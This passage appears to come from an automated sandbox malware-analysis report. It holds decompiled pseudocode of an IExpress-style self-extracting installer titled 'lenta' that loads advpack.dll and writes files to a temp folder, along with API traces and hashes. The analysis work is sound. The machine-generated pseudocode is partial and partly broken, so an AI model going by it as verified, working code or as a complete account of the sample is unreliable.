					return E00076CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x000736f9
0x00073700
0x0007370c
0x00073716
0x00073718
0x0007371b
0x00073721
0x0007372b
0x0007373d
0x00073745
0x00073746
0x00073746
0x00073749
0x000737ab
0x000737ad
0x000737ae
0x000737b3
0x000737b8
0x000737b8
0x000737bf
0x000737bf
0x000737c5
0x00000000
0x00000000
0x000737cb
0x000737cd
0x00000000
0x00000000
0x000737d5
0x000737db
0x000737e8
0x000737ea
0x000737ea
0x000737ea
0x000737f0
0x000737f6
0x00073805
0x00073817
0x0007382b
0x00073830
0x00073836
0x0007383b
0x0007383d
0x000738eb
0x000738eb
0x000738f2
0x0007390c
0x00073911
0x00073911
0x00073913
0x0007394d
0x0007394d
0x0007394f
0x000738a9
0x000738a9
0x000738b0
0x000738b2
0x000738b9
0x000738bb
0x000738c1
0x00073975
0x000738c7
0x000738de
0x000738e0
0x000738e0
0x0007397b
0x0007397d
0x000739a9
0x0007397f
0x00073982
0x0007398b
0x0007398d
0x0007398f
0x0007399f
0x000739a1
0x00073991
0x00073991
0x00073991
0x0007398f
0x000739af
0x000739b6
0x00073a0f
0x00073a0f
0x00073a11
0x00073a13
0x00073a19
0x00000000
0x000739b8
0x000739b8
0x000739ba
0x00000000
0x00000000
0x000739bc
0x000739bf
0x00000000
0x00000000
0x000739c3
0x000739c9
0x000739ce
0x000739d0
0x000739e3
0x000739e5
0x000739e6
0x000739f1
0x000739f7
0x000739fa
0x00073a01
0x00073a04
0x00000000
0x00000000
0x00073a06
0x00073a09
0x00073a09
0x00073a0b
0x00073a0b
0x00000000
0x00073a09
0x000739fc
0x00000000
0x000739fc
0x000739d3
0x000739d8
0x000739da
0x00000000
0x00000000
0x00000000
0x000739dc
0x000739b6
0x00073955
0x0007395b
0x00000000
0x00000000
0x00073961
0x00073963
0x00000000
0x00000000
0x00073969
0x00073969
0x00000000
0x00073969
0x00073915
0x00073915
0x0007391b
0x0007391f
0x00000000
0x00000000
0x0007392d
0x00073933
0x00073938
0x0007393a
0x00000000
0x00000000
0x00073940
0x00073946
0x0007394b
0x00000000
0x0007394b
0x00000000
0x000738f2
0x00073843
0x00073845
0x00000000
0x00000000
0x0007384b
0x0007384d
0x00073883
0x00073885
0x00000000
0x00000000
0x0007389a
0x0007389e
0x0007389e
0x00000000
0x00000000
0x000738a0
0x000738a0
0x000738a2
0x00000000
0x00000000
0x000738a4
0x00000000
0x000738a4
0x0007384f
0x00073851
0x00073857
0x0007386e
0x00073877
0x0007387b
0x00000000
0x00000000
0x00000000
0x00073881
0x00073859
0x0007385c
0x00073862
0x00073866
0x00000000
0x00000000
0x00073868
0x00000000
0x000738f4
0x000738f4
0x000738f5
0x000738fb
0x00073901
0x00073901
0x00000000
0x0007390a
0x0007374b
0x0007374e
0x0007375c
0x00073764
0x00073769
0x0007376e
0x00073771
0x0007379c
0x0007379f
0x00000000
0x00000000
0x000737a3
0x000737a4
0x00000000
0x000737a4
0x00073773
0x00073777
0x00073778
0x0007377f
0x00073781
0x0007378e
0x0007378e
0x00073794
0x00000000
0x00073794
0x00073783
0x00000000
0x00000000
0x00073785
0x0007378c
0x00000000
0x00000000
0x00000000
0x0007378c
0x00073750
0x00000000
0x0007372d
0x0007372d
0x0007396b
0x0007396b
0x0007396c
0x0007396e
0x0007396f
0x00073a1e
0x00073a1e
0x00073a22
0x00073a27
0x00073a3e
0x00073a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00073723
MessageBeep.USER32(00000000), ref: 000739C3
MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 000739F1

Strings

lenta, xrefs: 000739E9, 00073A19
3, xrefs: 00073785

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$lenta
API String ID: 2519184315-4216304122
Opcode ID: e767ac07de68115a761184d0d8ebb6da93a5edf75995d688b8cf5ce4735f335e
Instruction ID: dfa5a867797529e7159478074230491437bb7500883b17358f9414d24dccb853
Opcode Fuzzy Hash: e767ac07de68115a761184d0d8ebb6da93a5edf75995d688b8cf5ce4735f335e
Instruction Fuzzy Hash: C391F5B1E012149BFBB98A14CC817EA77F0AB85300F15C0A9D94DA7251DB7D8F81EB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00076495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00076495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x78004; // 0xdaa0d862
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00071781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0007658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00076CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00076495
0x00076495
0x000764a0
0x000764a7
0x000764ab
0x000764bd
0x000764c2
0x000764d3
0x000764df
0x000764e8
0x00076502
0x000764ee
0x000764f9
0x000764f9
0x00076516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000764DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 000764F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00076502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000764AC
advpack.dll, xrefs: 000764C2, 000764CD, 00076501

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-2381869747
Opcode ID: 64da51b8c0921fc7277daf1e444c0064409827c59a5534ac33405a4bc52abdb0
Instruction ID: 46a183010113fc9e928812df1b89ddef490ab125fbb329325f8ec7f5bdaf0e12
Opcode Fuzzy Hash: 64da51b8c0921fc7277daf1e444c0064409827c59a5534ac33405a4bc52abdb0
Instruction Fuzzy Hash: F901D630E045089BEB50DB74DC49AEE7378EB91311F904195F58EA21C0DF7DAEC5CA55

Uniqueness

Uniqueness Score: -1.00%

Function 000728E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00072773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00072A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00072A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x000728f1
0x000728f4
0x000728f7
0x000728f9
0x000728fc
0x000728ff
0x00072901
0x00072907
0x00072a62
0x00072a64
0x0007290d
0x0007290d
0x0007290f
0x00072912
0x00072920
0x00072937
0x00000000
0x00000000
0x00072944
0x0007294a
0x0007294f
0x00072a2f
0x00072a32
0x00072a34
0x00072a37
0x00072a41
0x00000000
0x00000000
0x00072955
0x0007295e
0x00072962
0x00072969
0x0007296f
0x00072974
0x0007298c
0x00072a20
0x00072a21
0x00072a27
0x00072a4c
0x00072a4f
0x00072a50
0x00072a53
0x00072a56
0x00072a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x000729b2
0x000729b2
0x000729b5
0x000729bd
0x000729c3
0x000729cc
0x000729d5
0x000729d7
0x000729da
0x000729dd
0x000729df
0x000729ec
0x000729f8
0x000729fc
0x000729ff
0x00072a02
0x00072a07
0x00072a0a
0x00072a0f
0x00072a19
0x00072a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00072a0f
0x0007298c
0x00072974
0x00072962
0x00000000
0x0007294f
0x00072912
0x00072a65
0x00072a68
0x00072a6c
0x00072a6f
0x00072a6f
0x00072a7d

APIs

GlobalFree.KERNEL32 ref: 00072A6F

Part of subcall function 00072773: CharUpperA.USER32(DAA0D862,00000000,00000000,00000000), ref: 000727A8
Part of subcall function 00072773: CharNextA.USER32(0000054D), ref: 000727B5
Part of subcall function 00072773: CharNextA.USER32(00000000), ref: 000727BC
Part of subcall function 00072773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072829
Part of subcall function 00072773: RegQueryValueExA.ADVAPI32(?,00071140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072852
Part of subcall function 00072773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00072870
Part of subcall function 00072773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 000728A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00073938,?,?,?,?,-00000005), ref: 00072958
GlobalLock.KERNEL32 ref: 00072969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00073938,?,?,?,?,-00000005,?), ref: 00072A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00072A81

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 8e0c1f1aa32bb7609ea4ec81dcd57dade7021cf3ce8cb08421ce10460b11026d
Instruction ID: 0656aad1b7058a4b95c734fe2cba168b8fe054c8241d84950144b9c9aaefea9e
Opcode Fuzzy Hash: 8e0c1f1aa32bb7609ea4ec81dcd57dade7021cf3ce8cb08421ce10460b11026d
Instruction Fuzzy Hash: 54512B31E00219EFDB21DF98C884AEEBBF5FF48700F14812AE909E3251D7399941DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00074169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00074169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0007468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0007468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E000744B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0007417d
0x0007418f
0x00074193
0x000741b7
0x000741d3
0x000741e6
0x00000000
0x000741e7
0x000741d5
0x000741d6
0x000741d8
0x000741d9
0x000741da
0x000741df
0x000741e1
0x00000000
0x000741e1
0x000741b9
0x000741ba
0x000741bc
0x000741bd
0x000741be
0x00000000
0x000741be
0x00000000

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,000730B4), ref: 00074189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,000730B4), ref: 000741E7

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Strings

FINISHMSG, xrefs: 00074173, 000741AB
<None>, xrefs: 000741C5

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: aff729620cbef416e0767788afd672704b86a6e6c674821d5bf4629639d69c55
Instruction ID: 5fabc3cc8253fd2d17ff11469ab092c6d4eebbffde9fc294e8d3183a8abdcbf4
Opcode Fuzzy Hash: aff729620cbef416e0767788afd672704b86a6e6c674821d5bf4629639d69c55
Instruction Fuzzy Hash: DE01ADB1F002243BF32426698C86FBB218EDBD6795F40C025B70DE11C19B6CCC4141BD

Uniqueness

Uniqueness Score: -1.00%

Function 000719E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E000719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x78004; // 0xdaa0d862
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E000743D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x79a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00076CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x000719e0
0x000719e0
0x000719eb
0x000719f2
0x000719f9
0x000719fc
0x00071a01
0x00071a2a
0x00071a2e
0x00071a3e
0x00071a4f
0x00071a62
0x00071a6a
0x00000000
0x00071a03
0x00071a06
0x00071a20
0x00071a20
0x00071a08
0x00071a08
0x00071a14
0x00000000
0x00071a16
0x00071a18
0x00071a70
0x00071a72
0x00071a72
0x00071a14
0x00071a06
0x00071a81

APIs

EndDialog.USER32(?,?), ref: 00071A18
GetDesktopWindow.USER32 ref: 00071A24
LoadStringA.USER32(?,?,00000200), ref: 00071A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00071A62
MessageBeep.USER32(000000FF), ref: 00071A6A

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 571a04c7fdfa1f06892e5e1928a3065a5963201d4441975d39e4085a8c5eefeb
Instruction ID: 493a274fded918e32ca6ad1b3d172b7916399177d160c13f16dae01eb42b00cf
Opcode Fuzzy Hash: 571a04c7fdfa1f06892e5e1928a3065a5963201d4441975d39e4085a8c5eefeb
Instruction Fuzzy Hash: 3311A931E01109AFEB10DF68DD08AED77B4FF85311F508164F91AA61D1DA3C9E41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 000763C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x78004; // 0xdaa0d862
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00071781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				E0007658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x79124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x79124 = 0x80070052;
					_t37 = 0;
				}
				return E00076CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x000763cb
0x000763d2
0x000763d8
0x000763ea
0x000763f3
0x00076401
0x00076402
0x00076410
0x00076415
0x00076433
0x00076438
0x00076449
0x00076463
0x0007646d
0x00076477
0x00076477
0x0007647a
0x0007643a
0x0007643a
0x00076444
0x00076444
0x00076492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0007642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0007645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0007647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000763EB

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-1193786559
Opcode ID: 0fdd3b050529e1c6be5d284a17cf314b2bcf53111c46b6dbf93949bfab765bae
Instruction ID: 923b083571e2656b4f364b217540e7fa6016184b4770678c841fcf21fc6f7b52
Opcode Fuzzy Hash: 0fdd3b050529e1c6be5d284a17cf314b2bcf53111c46b6dbf93949bfab765bae
Instruction Fuzzy Hash: FA21D571E00218ABEB10DF25DC85FEB77B8EB85314F008169F589A3180DABD5DC48FA8

Uniqueness

Uniqueness Score: -1.00%

Function 000747E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000747E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00071680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x791e0; // 0x2dd8320
						 *(_t34 + 4) = _t11;
						 *0x791e0 = _t34;
						return 1;
					}
					_t25 =  *0x78584; // 0x0
					E000744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x78584; // 0x0
				E000744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x000747e8
0x000747f0
0x000747f4
0x0007480f
0x00074811
0x00074814
0x00074814
0x00074816
0x00074817
0x00074829
0x0007482b
0x0007482f
0x0007484f
0x00074852
0x00074855
0x00074855
0x00074857
0x00074858
0x00074860
0x00074865
0x0007486a
0x0007486f
0x00000000
0x00074876
0x00074831
0x00074841
0x00074847
0x0007480b
0x00000000
0x0007480b
0x000747f6
0x00074806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00074E6F), ref: 000747EA
LocalAlloc.KERNEL32(00000040,?), ref: 00074823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00074847

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00074851

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-1193786559
Opcode ID: 4e6b24fab613305697f1cb11498ee1cec305cfd583308a7c38e4fdf4148194c1
Instruction ID: c2be603df8fbf1efce5c6261dc58c8775f21486a78d0a2a75122c75c7361fd39
Opcode Fuzzy Hash: 4e6b24fab613305697f1cb11498ee1cec305cfd583308a7c38e4fdf4148194c1
Instruction Fuzzy Hash: 681106B5E046416FE7A49F249C18FBA3B9AEBC6300B04C519F94AA7341DF3D8C068764

Uniqueness

Uniqueness Score: -1.00%

Function 00076517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00076517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x79a3c; // 0x70000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E000744B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0007651f
0x0007652a
0x00076534
0x0007656b
0x00076577
